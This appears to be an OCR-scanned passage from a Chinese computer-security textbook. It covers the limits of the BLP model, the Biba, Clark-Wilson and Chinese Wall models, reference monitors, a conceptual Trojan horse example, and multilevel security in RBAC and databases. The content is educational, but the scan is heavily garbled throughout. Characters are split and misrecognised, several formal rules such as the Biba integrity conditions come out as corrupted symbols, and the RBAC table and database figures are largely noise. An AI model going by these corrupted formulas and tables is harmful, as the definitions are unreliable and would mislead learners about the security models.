b: 段 描述 符 字 。 描 述 符 段 标识 主体 (进程 )。 段 描述 符 字 中 的 段 指针 标识 客体 (数据 段 )。 
- 段 描 述 符 字 中 的 三 个 访问 控制 位 标识 访问 方式 。 

M: 访问 控制 表 。 

Sf: 目录 段 和 进程 级 别 表 中 的 信息 。 

H: 分 层 段 结构 。 





L ,= 段 安全 级 别 
[一 用 户 安全 级 别 





Æ 13-3 Multics 的 MLS 数据 结构 


具有 了 这 些 数据 结构 ，Multics 就 可 以 实施 自主 访问 控制 和 强制 访问 控制 。 当 一 个 进程 试 
图 访问 一 个 段 时 ， 它 必须 具有 访问 控制 表 指 定 的 期 望 访问 许可 。 并 且 ， 需 将 它 的 安全 许可 与 被 
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访问 段 的 安全 等 级 比较 ， 以 确定 是 否 满足 简单 安全 规则 和 *- 安全 规则 。 


13.1.7 BLP 模型 的 限制 


尽管 BLP 模型 在 理论 上 为 单一 行政 管理 环境 中 的 安全 计算 奠定 了 基础 ， 但 它 在 可 用 性 方 
面 也 存在 一 些 严 重 的 限制 ， 导 致 它 难于 实现 。 

首先 ， 在 一 个 MLS 系统 中 ,保密 性 与 完整 性 不 相 容 。 一 般 来 说 ，MLS 要 么 追求 “权力 ” 
要 么 追求 “机 密 ”， 但 很 难 同 时 实现 这 二 者 。 这 种 互 斥 性 把 一 些 在 BLP 风格 的 MLS 环境 中 有 
效 使 用 的 以 权力 和 完整 性 为 中 心 的 有 意思 的 技术 排斥 在 外 。 

第 二 个 可 用 性 方面 的 严重 限制 是 在 出 现 隐蔽 通道 时 产生 的 所 谓 “ 合 谋 者 〈cooperating 
conspirator)” 问 题 。 对 于 共享 资源 ，*- 特性 变 得 不 可 执行 。 特 别 是 对 于 在 当前 的 字 处 理 和 其 他 
文件 格式 中 流行 的 活动 内 容 ， 问 题 尤为 严重 。 当 主体 利用 共享 资源 的 隐 菩 通道 执行 广播 的 涉 密 
文件 时 ， 亚 意 文件 可 能 被 包括 其 中 。 基 本 上 ， 当 (不 可 信 的 ) 低 密级 可 执行 数据 被 允许 由 高 许 
可 的 (可 信 的 ) 主体 执行 时 ，BLP 模型 就 被 有 效 地 破坏 了 。 


13.2 计算 机 安全 的 其 他 形式 化 模型 

值得 注意 的 是 ， 本 章 描述 的 模型 除了 中 国 墙 模 型 之 外 ， 要 么 关注 保密 性 ， 要 么 关注 完整 
性 。 保 密 性 和 完整 性 不 相 容 的 问题 被 认为 是 MLS 总 体 可 用 性 的 一 个 主要 限制 ， 特 别 是 对 关注 
保密 性 的 MLS 而 言 。 

本 节 探 讨 其 他 几 个 重要 的 计算 机 安全 模型 。 


13.2.1 Biba 完整 性 模型 


BLP 模型 涉及 保密 性 ， 关 心 信 息 的 非 授 权 泄 露 。Bib 模型 [BIBA77] 则 涉及 完整 性 ， 关 心 
数据 的 非 授 权 修 改 。Biba 模型 旨 在 处 理 数 据 必 须 对 多 个 或 所 有 安全 级 别 的 用 户 可 见 但 只 能 由 授 
权 主 体 (agent) 以 可 控 方 式 修改 的 情况 。 
Biba 模型 的 基本 元 素 具有 与 BLP 模型 的 相同 结构 。 与 BLP 一 样 ，Biba 模型 涉及 主体 和 客 
体 。 每 个 主体 和 客体 都 被 分 配 一 个 完整 性 级 别 ， 分 别 用 I(S) 和 1 (0O) 表示 主体 S 和 客体 O 的 完 
整 性 级 别 。 可 以 采用 简单 的 层次 结构 的 密级 分 配方 案 ， 按 照 从 低 到 高 严格 的 级 别 次 序 排列 。 与 
BLP 模型 一 样 ， 也 可 以 为 密级 分 配方 案 增 加 范畴 集 ， 我 们 这 里 将 其 忽略 。 
该 模型 考虑 如 下 访问 方式 : 
e 修改 (modify): 在 客体 中 写 入 或 更 新 信息 。 
e 观察 (observe): 读 取 客体 中 的 信息 。 
© FUT (execute): 执行 客体 。 
e 调用 (invoke); 从 一 个 主体 到 另 一 个 主体 的 通信 。 
前 三 种 方式 与 BLP 的 访问 方式 类 似 。 调 用 方式 是 新 增 的 。Biba 随后 提出 许多 可 以 作用 于 
该 模型 的 备 选 策略 。 最 相关 的 是 严格 完整 性 策略 ， 它 基于 下 述 规则 : 
e 简单 完整 性 (simple integrity): 主体 可 以 修改 客体 ， 仅 当主 体 的 完整 性 级 别 优势 于 客体 
的 完整 性 级 别 时 : 1(S)\S1 (0). 

e 完整 性 禁闭 (integrity confinement): 主体 可 以 读 客体 ， 仅 当主 体 的 完整 性 级 别 劣势 于 
客体 的 完整 性 级 别 时 : I(9) 委 I(O)。 

e 调用 性 质 (invocation property): 一 个 主体 可 以 调用 另 一 个 主体 ， 仅 当 第 一 个 主体 的 完 
整 性 级 别 优势 于 第 二 个 主体 的 完整 性 级 别 时 : 1(S:))<I (S) 

前 两 个 规则 与 BLP 模型 的 规则 类 似 ， 但 关注 于 完整 性 ， 并 颠倒 了 读 、 写 重要 性 的 顺序 。 


> 
© 
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简单 完整 性 规则 是 逻辑 上 的 向 上 写 限制 ， 用 于 防止 污染 高 完整 性 数据 。 图 13-4 说 明了 完整 性 

禁闭 规则 的 必要 性 。 低 完整 性 进程 可 以 读 低 完整 性 数据 ， 但 被 简单 完整 性 规则 阻止 用 低 完整 性 
数据 污染 高 完整 性 文件 。 仅 当 完 整 性 禁闭 规则 有 效 时 ， 高 完整 性 进程 才 可 能 将 低 完整 性 数据 复 
制 到 高 完整 性 文件 。 正 常情 况 下 ， 一 个 人 愿意 信任 高 完整 性 进程 不 会 污染 高 完整 性 文件 ， 但 进 
程 代 码 错误 或 特洛伊 木马 都 会 导致 这 种 污染 ， 因 此 完整 性 禁闭 规则 是 必要 的 。 





高 完整 性 文件 低 完 整 性 文件 
不 允许 
图 13-4 具有 简单 完整 性 控制 的 污染 


来 源 : [GASS88] 
13.2.2 Clark-Wilson 完整 性 模型 


一 个 更 精致 可 能 也 更 实用 的 完整 性 模型 由 Clark 和 Wilson[CLAR87] 提出 。Clark-Wilson 模 
型 (CWM) 针对 商业 应 用 而 不 是 军事 应 用 ， 它 逼真 地 模拟 了 真实 的 商业 运营 。 该 模型 是 在 以 
下 两 个 通常 用 于 实施 商业 安全 策略 的 概念 基础 上 提出 的 : 

© 良 形 事务 well-formed transaction): 用 户 不 能 随意 操纵 数据 ， 只 能 以 受 控 的 方式 操作 

数据 ， 以 保持 或 确保 数据 的 完整 性 。 

e 用 户 职责 分 离 ( separation of duty among user): 任何 被 允许 创建 或 证 明 一 个 良 形 事务 的 

人 不 能 被 允许 执行 该 事务 (至少 对 于 生产 数据 )。 

该 模型 对 数据 和 操作 数据 的 事务 加 以 完整 性 控制 。 模 型 的 主要 组 件 如 下 : 

e 约束 数据 项 (Constrained Data Item, CDI): 受到 严格 完整 性 控制 的 主体 。 

© 无 约束 数据 项 ( Unconstrained Data Item, UDI): 未 经 检查 的 数据 项 。 一 个 例子 是 纯 文 

本 文件 。 
e 完整 性 验证 过 程 (Integrity Verification Procedure, IVP): 由 在 确保 所 有 的 CDI 符合 某 个 
应 用 专用 模型 的 完整 性 和 一 致 性 。 

o 转换 过 程 ( Transformation Procedure, TP): 将 CDI 从 一 个 一 致 状态 改变 到 另 一 个 一 致 

状态 的 系统 事务 。 

CWM 通过 TP 上 的 认证 和 实施 规则 来 实施 完整 性 。 认 证 规则 (certification rule) 是 对 IVP 
Al TP 行为 的 安全 策略 限制 。 实 施 规则 (enforcement ule) 是 归档 认证 规则 目标 的 内 建 系 统 安 
全 机 制 。 这 些 规则 如 下 : 

C1: 所 有 的 IVP 必须 完全 保证 当 其 运行 时 所 有 的 CDI 处 于 有 效 状 态 。 

C2 : 所 有 的 TP 必须 被 认证 是 有 效 的 。 也 就 是 说 ， 它 们 必须 将 一 个 从 有 效 状态 开始 的 CDI 
转换 到 一 个 有 效 的 最 终 状 态 。 对 于 每 个 TP 和 每 个 可 操纵 的 CDI 集 合 ， 安 全 官 必 须 规定 定义 此 
次 执行 的 关系 。 关 系 的 形式 为 (Tpi, (CDIa, CDIb, CDIc…))， 其 中 CDI 列表 定义 了 TP 被 认证 的 
参数 集合 。 

E1: 系统 必须 维护 规则 C2 指定 的 关系 列表 ， 必 须 确保 任何 CDI 被 一 个 TP 唯一 操纵 ， 其 

中 TP 运行 在 某 个 关系 指定 的 CDI 上 。 
E2: 系统 必须 维护 一 个 形 如 (UserID, Tpi, (CDIa, CDIb, CDIc…)) 的 关系 列表 ,将 用 户 、TP 和 
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TP 可 以 代表 用 户 访问 的 数据 对 象 关联 起 来 。 它 必须 确保 只 有 其 中 一 个 关系 描述 的 执行 在 运行 。 

C3: E2 中 的 关系 列表 必须 被 认证 可 满足 职责 分 离 要 求 。 

E3: 系统 必须 鉴别 每 个 试图 执行 TP 的 用 户 的 身份 。 

C4: 所 有 的 TP 必须 被 认证 可 将 所 有 人 允许 重 构 操作 所 必需 的 信息 写 人 只 追加 (append-only ) 
CDI (日 志 )。 

C5: 任何 将 UDI 作为 输入 值 的 TP， 对 任何 UDI 可 能 值 ， 必 须 被 认证 仅 能 执行 有 效 的 事 
务 ， 否 则 不 进行 转换 。 转 换 应 该 将 来 自 UDI 的 输入 转换 为 CDI， 否 则 UDI 被 拒绝 。 一 般 ， 这 
是 一 个 编辑 程序 。 

E4: 仅 有 被 允许 认证 实体 的 主体 可 以 改变 这 些 与 其 他 实体 关联 的 实体 列表 ， 特 别 是 与 CDI 
关联 的 TP 列表 和 与 TP 关联 的 用 户 列表 。 能 够 认证 实体 的 主体 可 能 没有 对 该 实体 的 执行 权 。 

图 13-5 说 明了 这 些 规则 。 这 些 规则 组 合 形成 一 个 包含 两 部 分 内 容 的 完整 性 保障 设施 ， 其 
中 认证 部 分 由 负责 完整 性 策略 的 安全 官 完 成 ， 实 施 部 分 由 系统 完成 。 


CDI= 约 束 数据 项 
IVP= 完 整 性 验证 过 程 
TP= 转 换 过 程 
UDI= 无 约束 数据 项 





E4: 授 权 列 表 仅 
由 安全 官 改变 


E1:CDI 仅 由 授权 TP 改变 /) 


图 13-5 Clark-Wilson 系统 完整 性 规则 


来 源 : [CLAR87] 


13.2.3 ”中 国 墙 模型 


中 国 墙 模型 ( Chinese Wall Model, CWM) 采用 了 与 我 们 前 面 分 析 的 所 有 方法 都 截然 不 同 
的 方法 来 规定 完整 性 和 保密 性 。 该 模型 是 为 可 能 发 生 利益 冲突 的 商业 应 用 开发 的 ， 同 时 利用 了 
自主 和 强制 访问 概念 。 

CWM 的 主要 思想 是 在 金融 界 和 法 律 界 常用 的 一 个 思想 ， 它 利用 “中 国 墙 ”来 防止 利益 冲 
突 。 金 融 界 的 一 个 例子 是 一 个 在 某 金 融 机 构 工 作 的 市 场 分 析 员 可 以 提供 公司 业务 服务 。 当 分 析 
员 掌握 某 公司 竞争 对 手 的 计划 和 状况 等 保密 信息 (内幕 知识 ) 时 ， 不 允许 他 为 该 公司 提供 建议 。 
然而 ,分 析 员 可 以 自由 地 为 多 家 不 处 于 竞争 地 位 的 公司 提供 建议 ， 提 供 对 公众 公开 的 市 场 信息 。 

该 模型 的 要 素 如 下 : 
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e + (subject): 期 望 访 问 受 保 护 客 体 的 活动 实体 ， 包 括 用 户 和 进程 。 
e 信息 (information): 按 三 级 层次 结构 组 织 的 公司 信息 : 
m EK (object): 独立 信息 项 ， 每 一 项 对 应 一 家 公司 。 
= 数据 集 (DataSet, DS): 对 应 同一 家 公司 的 所 有 客体 。 
m 利益 冲突 (Conflict of Interest, Cl) 类 : 所 有 处 于 竞争 地 位 的 公司 的 数据 集 。 
© 访问 规则 (access rule): 读 、 写 访问 规则 。 
图 13-6a 给 出 一 个 例子 。 其 中 的 数据 集 代表 银行 、 石 油 公 司 和 燃气 公司 。 所 有 的 银行 数据 
集 在 一 个 CI 中 ， 所 有 的 石油 公司 数据 集 在 另 一 个 CI 中 ， 依 此 类 推 。 





b ) John 可 以 访问 银行 A 和 石油 公 A c) Jane 可 以 访问 银行 A 和 石油 公 司 B 
图 13-6 ”两 个 CI 间 的 潜在 信息 流 


与 我 们 前 面 研 究 过 的 模型 不 同 ，CWM 不 为 主体 和 客体 分 配 安全 级 别 ， 因 此 不 是 真正 的 多 
级 安全 模型 。 相 反 ， 由 主体 以 前 的 访问 历史 决定 访问 控制 。 中 国 墙 策略 的 基础 是 主体 被 允许 访 
问 的 信息 不 能 与 其 已 拥有 的 任何 其 他 信息 相 冲突 。 一 有 旦 主体 访问 一 个 数据 集中 的 信息 ， 就 立 起 
一 堵 墙 来 保护 相同 CI 中 其 他 数据 集 的 信息 。 主 体 可 以 访问 墙 一 侧 的 信息 ， 但 不 能 访问 另 一 侧 
的 信息 。 另 外 ， 其 他 CI 中 的 信息 最 初 被 认为 不 在 墙 的 任何 一 侧 ， 而 是 处 于 局 外 。 当 同一 个 主 
体 对 其 他 CI 再 进行 访问 时 ， 墙 的 形状 发 生 改变 以 保持 期 望 得 到 的 保护 。 此 外 ， 每 个 主体 被 他 
自己 的 墙 所 控制 一 一 不 同 主体 的 墙 是 不 同 的 。 

为 了 实施 中 国 墙 策略 ， 需 要 两 个 规则 。 为 了 表明 与 BLP 两 个 规则 的 相似 性 ， 其 发 明 者 采 
用 了 相同 的 名 字 。 第 一 个 规则 是 简单 安全 规则 : 

简单 安全 规则 (simple security rule); 主体 S AW “ik” BAKO MY 

e 0 与 $S 已 访问 的 一 个 客体 在 同一 个 DS 中 ， 或 者 

e ORTS 尚未 访问 任何 信息 的 一 个 Cl 

图 13-6b 和 c 说 明了 该 规则 的 执行 过 程 。 假 定 在 某 一 点 ，John 对 银行 A 的 DS 中 的 一 个 
客体 产生 他 对 这 个 数据 集中 的 所 有 客体 的 第 一 个 “ 读 ” 请 求 。 因 为 John 以 前 从 未 访问 CI 1 
中 任何 其 他 DS 中 的 客体 ， 该 访问 被 授权 。 此 外 ， 系 统 必 须 记 住 这 次 授权 的 访问 ， 以 拒绝 任 
何 随后 对 银行 B 的 DS 中 的 客体 的 访问 请 求 。 任 何 对 银行 A 的 DS 中 的 其 他 客体 的 访问 请 求 
被 授权 。 后 来 , John 请 求 访问 石油 公司 A 的 DS 中 的 一 个 客体 。 因 为 没有 冲突 ， 访 问 被 授权 ， 
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但 将 立 起 一 堵 墙 以 禁止 随后 对 石油 公司 B 的 DS 的 访问 。 类 似 地 ， 图 13-6c 反映 了 Jane 的 访 
问 历史 。 

简单 安全 规则 不 能 阻止 会 引起 利益 冲突 的 间接 信息 流 。 在 我 们 的 例子 中 ，John 可 以 访问 
石油 公司 A 的 DS 和 银行 A 的 DS，Jane 可 以 访问 石油 公司 B 的 DS 和 银行 A 的 DS。 如 果 
John 被 允许 从 石油 公司 A 的 DS 中 读 取 数 据 ， 并 被 允许 写 人 银行 A 的 DS， 那 他 就 可 以 将 关于 
石油 公司 A 的 信息 传送 到 银行 A 的 DS。 这 在 图 中 表示 为 将 银行 A 的 DS 中 的 第 一 个 客体 的 值 
改 为 g。 然 后 Jane 可 以 读 取 该 数据 。 这 样 ，Jane 可 以 同时 访问 石油 公司 A 和 石油 公司 B 的 信 
E, 产生 利益 冲突 。 为 了 避免 这 种 情况 ，CWM 制订 了 第 二 个 规则 : 

* - 特性 规则 (*-property rule): 主体 S 可 以 “ 写 ” 客 体 O 仅 当 

o S 可 以 依据 简单 安全 规则 “ 读 ”O， 以 及 

e S 能 访问 的 所 有 客体 都 与 O 在 同一 个 DS 中 。 

换 名 话说， 要么 主体 根本 不 能 写 ， 要 么 主体 的 访问 (包括 读 和 写 ) 都 被 限制 在 一 个 数据 集 |454 
中 。 因 此 ， 在 图 13-6 F, John 和 Jane 都 不 能 “ 写 ” 全 部 数据 域 中 的 任何 客体 。 455 

* - 特性 规则 限制 得 很 严格 。 然 而 ， 很 多 情况 下 ， 因 为 用 户 扮演 某 个 分 析 角 色 ， 所 以 仅仅 
需要 “ 读 ” 访 问 权 。 

为 了 稍微 减轻 “ 写 ” 限 制 ， 模 型 加 进 了 净化 数据 (sanitized data) 的 概念 。 本 质 上 ， 净 化 
数据 是 可 以 从 公司 数据 推导 出 但 又 不 能 用 来 发 现 公 司 身份 的 数据 。 任 何 仅 由 净化 数据 组 成 的 
DS 不 需 用 墙 来 保护 ， 因 而 CWM 的 两 个 规则 不 会 运用 到 这 样 的 DS 中 。 


13.3 ”可 信和 系统 的 概念 


前 两 节 描述 的 模型 都 旨 在 增强 用 户 和 管理 员 对 计算 机 系统 安全 的 信任 。 计 算 机 安全 语 境 中 
的 信任 trust) 思想 可 以 追溯 到 20 世纪 70 年 代 初 ， 那 时 美国 国防 部 发 起 该 领域 的 研究 并 予以 
投资 。 早 期 研究 的 目标 是 开发 安全 模型 ， 继 而 设计 和 实现 达成 信任 的 硬件 / 软件 平台 。 由 于 成 
本 和 性 能 问题 ， 可 信 系 统 在 商业 市 场 并 没有 获得 真正 的 立足 之 地 。 最 近 ， 随 着 可 信 计 算 机 平台 
方面 的 工作 (我 们 将 在 13.5 节 探 讨 这 个 话题 ) 的 开展 ， 人 们 对 信任 的 兴趣 重新 燃 起 。 本 节 我 们 
分 析 可 信 系 统 的 一 些 基 本 概念 和 含义 。 

一 些 与 可 信 系 统 相 关 的 有 用 术语 在 表 13-1 中 列 出 。 


表 13-1 与 信任 相关 的 术语 


信任 (trust) 
依赖 于 一 个 系统 的 人 对 该 系统 满足 其 要 求 (如 该 系统 完成 其 宣称 的 功能 且 不 执行 无 用 功能 ) 的 相信 程度 。 
可 信 系 统 (trusted system) 
认为 执行 一 组 给 定 属性 的 设置 而 达到 一 定 保障 程度 的 系统 。 
可 信赖 性 (trustworthiness) 
使 系统 值得 信任 的 保障 ， 以 便 信任 可 以 通过 某 种 令 人 信服 的 方式 (如 形式 化 分 析 或 代码 评审 ) 加 以 保证 。 
可 信 计 算 机 系统 (trusted computer system) 
部 署 足够 的 硬件 和 软件 保障 措施 以 允许 对 各 种 敏感 或 涉 密 信息 同时 处 理 的 系统 。 
Fit ME (trusted computing base, TCB) 
系统 中 用 来 实施 特定 策略 的 一 部 分 。TCB 必须 抗 算 改 、 抗 欺骗 。TCB 应 该 足够 小 ， 以 便 对 其 系统 进行 分 析 。 
保障 (assurance ) 
确保 系统 按照 其 安全 策略 预期 而 开发 和 运行 的 过 程 。 
评价 (evaluation) 
评估 产品 是 否 具有 所 宣称 的 安全 特性 。 
功能 性 (functionality ) 
产品 提供 的 安全 特征 。 456 
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13.3.1 基准 监视 器 


关于 可 信和 系统 和 可 信 操 作 系 统 的 最 初 工作 基于 基准 监视 器 (reference monitor) 思想 ， 如 
图 13-7 所 示 。 基 准 监视 器 是 计算 机 硬件 和 操 
作 系 统 中 的 控制 部 件 ， 其 通过 主体 和 客体 的 安 
全 参数 来 控制 主体 对 客体 的 访问 。 基 准 监 视 器 
可 以 访问 一 个 叫 作 安全 内 核 数据 库 ( security 
kernel database) 的 文件 ， 其 中 列 出 了 每 个 主体 
的 访问 权 (安全 许可 ) 和 每 个 客体 的 保护 属性 
(密级 )。 基 准 监视 器 执行 安全 规则 (不 上 读 、 
不 下 写 ) 并 具有 下 列 特性 : 

e 完全 干预 (complete mediation): 安全 
规则 作用 于 每 次 访问 ， 而 不 是 仅仅 作用 
于 某 些 访问 (如 打开 文件 )。 

© 隔离 (isolation) : 保护 基准 监视 器 和 数 = 
据 库 不 被 非 授 权 修改 。 图 13-7 ”基准 监视 器 概念 

e 可 验证 性 (verifiability): 基准 监视 器 的 
正确 性 必须 是 可 证 明 的 ， 即 必须 能 够 从 数学 上 证 明基 准 监 视 器 执行 了 安全 规则 并 提供 
了 完全 干预 和 隔离 。 

这 些 需 求 都 要 求 很 高 。 完 全 干预 要 求 意 味 着 对 内 存 、 磁 盘 和 磁带 上 的 数据 的 每 次 访问 都 要 
干预 。 纯 软件 实现 需 付 出 的 性 能 代价 太 高 ， 故 而 不 可 行 ， 必 须 至 少 部 分 采用 硬件 实现 。 隔 离 要 
求 意味 着 不 管 攻击 者 多 么 聪明 ， 他 都 不 能 改变 基准 监视 器 的 逻辑 或 者 安全 内 核 数据 库 的 内 容 。 
最 后 ， 数 学 证 明 要 求 对 于 与 全 功能 计算 机 一 样 复杂 的 某 些 事物 来 说 非常 困难 。 可 以 提供 这 种 验 
证 的 系统 被 称 为 可 信赖 系统 (trustworthy system). 

图 13-7 所 示 的 最 后 一 个 部 件 是 审计 文件 。 重 要 的 安全 事件 如 检测 出 的 安全 违例 和 安全 内 
核 数 据 库 的 授权 改变 ， 都 保存 在 审计 文件 中 。 

为 了 满足 自身 需要 并 向 公众 提供 服务 ， 美 国 国防 部 于 1981 年 在 国家 安全 局 (National 
Security Agent, NSA) 成 立 了 计算 机 安全 中 心 (Computer Security Center)， 以 鼓励 广泛 应 用 
可 信 计 算 机 系统 为 目标 。 这 个 目标 已 经 通过 该 中 心 的 商业 产品 评价 程序 ( Commercial Product 
Evaluation Program) 而 实现 。 本 质 上 ， 该 中 心 试 图 根据 上 述 安全 要 求 来 评价 产品 是 否 能 投入 商 
用 。 该 中 心 根 据 他 们 所 提供 的 安全 特征 范围 来 对 产品 进行 分 级 评价 。 这 些 评价 标准 是 国防 部 采 
购 所 需要 的 ， 但 也 对 外 公开 ， 可 以 免费 获取 。 因 此 ， 它 们 可 以 作为 商业 客户 购买 商用 的 、 现 货 
的 设备 的 指南 。 


13.3.2 ”特洛伊 木马 防御 


避免 遭受 特洛伊 木马 攻击 的 一 种 方法 是 使 用 安全 、 可 信 的 操作 系统 。 图 13-8 给 出 了 一 个 
例子 。 这 里 ， 特 洛 伊 木马 用 来 绕 过 大 多 数 文件 管理 和 操作 系统 使 用 的 标准 安全 机 制 一 一 访问 控 
制 表 。 在 这 个 例子 中 ， 一 个 名 叫 Bob 的 用 户 通过 程序 与 包含 极其 敏感 的 字符 串 “CPE170KS ” 
的 数据 文件 交互 。 用 户 Bob 创建 该 文件 ， 并 仅 为 以 他 自己 名 义 执行 的 程序 提供 读 / 写 许可 。 也 
就 是 说 ， 只 有 属于 Bob 的 进程 才能 访问 该 文件 。 

特洛伊 木马 攻击 开始 于 一 个 名 叫 Alice 的 恶意 用 户 获 得 对 系统 的 合法 访问 ， 并 安装 了 特 洛 
伊 木马 程序 和 攻击 时 作为 “后 口袋 (back pocket)” 的 私有 文件 。Alice 给 自己 授予 对 该 文件 的 
读 / 写 许可 ， 给 Bob 授予 只 写 许 可 ( 见 图 13-8a) 。Alice 现在 可 能 通过 宣传 特洛伊 木马 程序 是 
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一 个 有 用 的 实用 程序 的 方式 来 引诱 Bob 调用 它 。 当 程序 检测 出 它 正在 被 Bob 执行 时 ， 它 就 从 
Bob 的 文件 中 读 出 敏感 字符 串 并 复制 到 Alice 的 后 口袋 文件 〈 见 图 13-8b) 。 读 和 写 操作 都 满足 
对 访问 控制 表 施加 的 约束 。Alice 只 需 稍 后 访问 她 自己 的 文件 便 能 得 知 字符 串 的 值 。 

现在 考虑 在 这 个 情景 中 使 用 安全 操作 系统 ( 见 图 13-8c)。 根 据 诸 如 访问 计算 机 的 终端 、 用 
口令 /中 标识 的 有 关 用 户 等 准则 来 确定 登录 主体 的 安全 级 别 。 在 这 个 例子 中 ， 有 两 个 安全 级 
别 一 一 敏感 级 和 公开 级 。 敏 感 级 高 于 公开 级 。Bob 所 有 的 进程 和 数据 文件 被 分 配 了 敏感 级 。 
Alice 的 文件 和 进程 被 限制 到 公开 级 。 如 果 Bob 调用 特洛伊 木马 程序 ( 见 图 13-8d)， 该 程序 获 [458 
得 Bob 的 安全 级 别 。 它 因此 能 够 在 满足 简单 安全 性 的 情况 下 看 到 敏感 字符 串 。 然 而 ， 当 程序 
试图 将 字符 串 保 存 到 公开 级 文件 (后 口袋 文件 ) 时 ，*- 特性 被 违反 ， 访 问 被 基准 监视 器 禁止 。 
因而 ， 即 使 访问 控制 表 允 许 ， 写 人 后 口袋 文件 的 企图 也 被 拒绝 。 可 见 ， 安 全 策略 优先 于 访问 控 
制 表 机 制 。 





图 13-8 ”特洛伊 木马 和 安全 操作 系统 


13.4 多 级 安全 的 应 用 
RFC4949 定义 多 级 安全 如 下 : 


多 级 安全 (Multilevel Secure, MLS): 一 种 系统 运行 模式 ， 其 中 , (a) 当 访 问 系统 的 某 些 用 
户 对 系统 处 理 的 某 些 数据 既 没 有 安全 许可 也 不 符合 “须知 ”原则 的 时 候 ， 人 允许 其 在 同一 个 系 


统 里 并 发 处 理 两 个 或 多 个 安全 级 别 的 信息 ; (b) 分 别 以 许可 和 密级 为 基础 实现 的 用 户 与 涉 密 
材料 的 分 离 ， 依 赖 于 操作 系统 控制 。 459 
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当 需 要 维护 已 定义 多 个 数据 敏感 性 级 别 的 资源 如 文件 系统 或 数据 库 时 ， 多 级 安全 便 会 令 
人 产生 兴趣 。 层 次 可 能 简单 得 只 有 两 级 (如 公开 级 和 私有 级 )， 也 可 能 有 多 级 (如 军事 上 的 公开 
级 、 内 部 级 、 保 密级 、 机 密级 和 绝密 级 )。 前 面 我 们 已 经 介绍 了 多 级 安全 的 基本 元 素 。 本 节 我 
们 来 看 看 多 级 安全 思想 的 两 个 应 用 领域 : 基于 角色 的 访问 控制 系统 和 数据 库 安全 。 


13.4.1 基于 角色 的 访问 控制 中 的 多 级 安全 9S 


[OSBO00] 说 明了 基于 角色 的 访问 控制 (RBAC) 系统 是 如 何 实现 BLP 多 级 安全 规则 的 。 
回忆 在 ANSI 标准 RBAC 规范 中 包含 的 管理 函数 的 概念 ， 其 中 规定 了 创建 、 删 除 和 维护 RBAC 
要 素 和 关系 的 能 力 。 这 里 为 这 些 函 数 分 配 特殊 的 管理 角色 是 很 有 用 的 。 表 13-2 总 结 了 RBAC 
的 组 件 ， 需 要 记 住 。 


表 13-2 RBAC BR 


U, APS 

R 和 AR， 不 相交 的 (普通 ) 角色 集 和 管理 角色 集 
PAAP, 不 相交 的 (普通 ) 许可 集 和 管理 许可 集 

S， 会 话 集 

P4 CPXR， 多 对 多 的 许可 到 角色 的 分 配 关 系 
AP4 C APXAR， 和 多 对 多 的 许可 到 管理 角色 的 分 配 关系 


UA C UXR， 多 对 多 的 用 户 到 角色 的 分 配 关系 
AUA C UX AR， 多 对 多 的 用 户 到 管理 角色 的 分 配 关系 


RH C RXR， 偏 序 的 角色 层次 关系 
ARH C 4RX 4R， 偏 序 的 角色 层次 关系 
(这 两 种 层次 关系 在 中 缀 表示 中 都 写作 “ 宇 ”) 


User: S~U， 映 射 会话 si 到 一 个 用 户 user(s) (在 会 话 的 生命 期 是 不 变 的 ) 的 函数 


Roles: S+2°" 映射 会 话 s; 到 角色 集 和 管理 角色 集 
Roles: (SG {r|(Ar'2r) [(user (s),r') E CdU4L4]} (可 随时 间 变 化 ) 会 话 & 具有 许可 U reno {P| (Arr) € PAU APA} 


一 个 约束 集 ， 规 定 了 上 面 列举 的 各 种 组 件 的 值 是 允许 还 是 拒绝 


下 面 的 形式 化 规范 说 明了 如 何 用 RBAC 系统 实现 MLS 访问 : 


e 用 户 约束 : 对 用 户 集 U 中 的 每 个 用 户 x， 都 分 配 一 个 安全 许可 工 (0。 形 式 化 地 ，VYzxE 
U[L(u) 是 给 定 的 ]。 

e 许可 约束 : 每 个 许可 分 配对 客体 o 的 读 或 写 许可 ， 并 且 每 个 客体 具有 一 个 读 许 可 和 一 
个 写 许 可 。 所 有 客体 都 有 安全 等 级 。 形 式 化 地 ,P= {(o, r), (o, w) | o 是 系统 中 的 客体 }; 
YoEP[L(o) 是 给 定 的 ]。 

e 定义 : 角色 vr 的 读 级 别 (表示 为 r-level(D))， 是 对 于 所 有 > 的 许可 中 的 (o,r), ZE o 的 
安全 级 别 的 最 小 上 界 。 角 色 > 的 写 级 别 〈 表 示 为 w-level (r))， 是 对 于 所 有 r 的 许可 中 的 
(o, w)， 客 体 o 的 安全 级 别 的 最 大 下 界 ， 如 果 存 在 这 样 一 个 最 大 下 界 的 话 。 如 果 最 大 下 
界 不 存在 ， 则 w-level 未 定义 。 

e UA 约束 : 每 个 角色 r 都 有 一 个 已 定义 的 写 级 别 ， 表 示 为 w-level (r)。 对 每 个 用 户 分 配 ， 
用 户 的 许可 必须 优势 于 角色 的 r-level 而 劣势 于 角色 的 w-level。 形 式 化 地 ,Yre 
UA [w-level (r) 已 定义 J; V(u, r)E UA [L(u)>r-level(n)]; V(u, r) E UA[L(u)<w-level(r)]. 

前 面 的 定义 和 约束 实现 了 BLP 模型 。 一 个 角色 可 以 包含 多 个 客体 的 访问 许可 。 角 色 的 


O ”读者 在 继续 阅读 之 前 可 能 需要 复习 4.5 节 。 
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r-level 表示 分 配给 角色 的 对 象 的 最 高 安全 等 级 。 因 而 ， 简 单 安全 性 (ALE) 要 求 可 以 给 用 户 
分 配 一 个 角色 ， 仅 当 用 户 的 许可 至 少 与 该 角色 的 r-level 一 样 高 时 。 类 似 地 ， 角 色 的 w-level 表 
示 它 的 客体 的 最 低 安全 等 级 。*- 安全 特性 (不 下 写 ) 要 求 给 用 户 分 配 一 个 角色 ， 仅 当 用 户 的 许 
可 不 高 于 该 角色 的 w-level 时 。 


13.4.2 ”数据 库 安全 与 多 级 安全 


将 多 级 安全 加 入 数据 库 系 统 增 加 了 访问 控制 功能 和 数据 库 自身 设计 的 复杂 性 。 一 个 关键 问 
题 是 密级 的 粒度 。 就 密级 粒度 而 言 ， 对 关系 数据 库 实施 多 级 安全 的 可 能 方法 如 下 CLES 13-9 ): 


ET 






Coia [nane] Me] [Nome | Dia | Sey J Bi 
|Andy | 4 | 43k 上 2345 | 


a [roes | Cany 
o [e pme] fowl a | ase T so 
Cany [4 [as | 77 
(Tames | 8 [5K | 9668 
Zig |e | em | 3054 


a) 按 表 划 分 密级 





Department 表 


[ea | 
[pid [Nene | wer |_| 





d) 按 元 素 划分 密级 
13-9 数据 库 密 级 划分 方法 
